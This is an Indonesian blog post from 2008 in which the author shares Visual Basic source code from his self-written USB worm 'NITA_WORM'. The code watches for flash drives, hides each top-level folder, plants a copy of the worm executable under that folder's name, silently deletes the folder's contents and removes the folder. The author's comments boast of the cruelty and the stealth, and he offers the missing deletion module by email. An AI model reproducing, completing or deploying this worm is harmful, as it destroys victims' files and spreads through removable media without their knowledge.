Darkside of Oktavianus

Making virus and all of them as our friends

Semoga Berguna..!!!

Posted by oktavianus pada November 20, 2008

Sebenernya source code ini sebagian dari NITA_WORM yang baru melangkah ke versi B (NITA_WORM_VERSI_B) tapi bosen juga lama-lama bikin virus/worm soalnya gw lagi ngurusin mao skripsi ntar kalo udah kelar gw mo produksi lagi worm yg lebih SIMPLE, SILENT, SUPER JAHAT, SUSAH KEDITECT(ama orang awam maksute) .
wauaduh orang orang dikampus gw pada tau dah kalo gw yg bikin NITA_WORM…..jangan2 emak-bapakya gw ngebuka situs virologi.info ntar ngeliat bahwa anaknya bikin malicious code bisa di semprot gw…ha..ha.. udah gk pake basa-basi lagi ya..

//////awal codenya////////
‘Fungsi API mendapat informasi drive
Private Declare Function GetDriveType Lib “kernel32” Alias _
“GetDriveTypeA” (ByVal nDrive As String) As Long

Const DRIVE_CDROM = 5
Const DRIVE_FIXED = 3
Const DRIVE_RAMDISK = 6
Const DRIVE_REMOTE = 4
Const DRIVE_REMOVABLE = 2

‘MemberiDirectoryAktifKeFlashDisk
Private Sub X()
On Error Resume Next
Dim i As Byte
For i = 1 To Drive1.ListCount – 1
If GetDriveType(Drive1.List(i) & “\”) = 2 Then
ChDrive (Drive1.List(i)) ‘memberi drive aktif ke FD
End If
Next i
End Sub
‘merefreshdrive & perintah usb dgn timer
Private Sub Timer1_Timer()
On Error Resume Next
Drive1.Refresh ‘merefresh drive 1 supaya perubahan langsung ditampilkan dari folder ke .EXE
Usb ‘go go goooo…
End Sub

Function BantaiFolder(Fold As String)
On Error Resume Next
Dim Fso As Object, FolderS
Dim keRecycleBin As Boolean
keRecycleBin = False
Set Fso = CreateObject(“Scripting.FileSystemObject”)
For Each FolderS In Fso.GetFolder(Fold).Subfolders ‘ fungsi VbScript u/ mendptkan informasi folder
SetAttr FolderS.path, vbHidden + vbSystem ‘mengeset folder jd hide
FileCopy App.path + “\” & App.EXEName +”.exe”, “\” + FolderS.Name + ” .exe” ‘menimpa folder dan menggunakan nama foldernya saja untuk di pasang ke body virus
DeleteFileEx Me.hWnd, CStr(hapus & FolderS.path & “\*.*”), keRecycleBin, False ‘ini untuk menghapus seluruh isi folder dengan extension apapun (walau attribut ReadOnly sekalipun) yang ada di dalam folder yg gandakan tapi di punya kelemahan see.. coding ini tidak bisa menghapus sampai ke subfolder terakhir sebenarnya bisa cuma nanti folder yg ada di dalam sub folder ikut digandakan dan ikut nongol di halaman muka flashdisk itu mengundang kecurigaan user pengguna flashdisk jadi yg digunakan hanya “FolderS.Path” yg artinya Folder pertama yg terdapat di halaman muka Flash disk.dan False itu artinya file yg dihapus nanti tidak ada konfirmasi dulu dari user artinya begitu flashdisk tercolok di komputer yg terinfeksi user langsung melihat file2 yg dia punya terhapus secara otomatis tanpa konfirmasi dulu ke yg punya Flashdisk ha..ha..eh gk boleh sombong sorry lupa maaf ya..
RmDir FolderS.path ‘menghapus folder pabila kosong maksudnya apa bila “FoldreS.Path”-nya kosong jadi di hapus dech.. yah kejam si memang sewaktu saya membuat coding ini saya sudah memikirkan hal itu tapi mo gmana lagi donkz..
Next FolderS ‘terus mencari ke folder selanjutnya
End Function

Private Sub Usb()
On Error Resume Next
Dim i As Byte ‘declarasi huruf i dengan type byte
Call X ‘memanggil private sub x
For i = 1 To Drive1.ListCount – 1 ‘perulangan sampai mendapat drive1.list = 2
If GetDriveType(Drive1.List(i) & “\”) = 2 Then ‘klo = 2 (FlashDisk)
BantaiFolder (Drive1.List(i) & “\”) ‘panggil fungsi bantai folder tuk ke FD
End If

Next i
End Sub

‘oh iya kalau source codenye lo compile error lah coz fungsi DeleteFileEx ada di modul jadi kalo lo mo dapet modulnya langsung ke email gw aja soalnya nih code riskan banget
takut dipake sama orang yg tidak bertanggung jawab karena ini murni lahir dari pikiran jahat gw jadi jangan ikutin jahat gw ya kalo masi punya kebaikan(tapi kalo worm writer/virus maker gk tau juga dech…)
visit me :
freestyle_truzz@yahoo.co.id

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: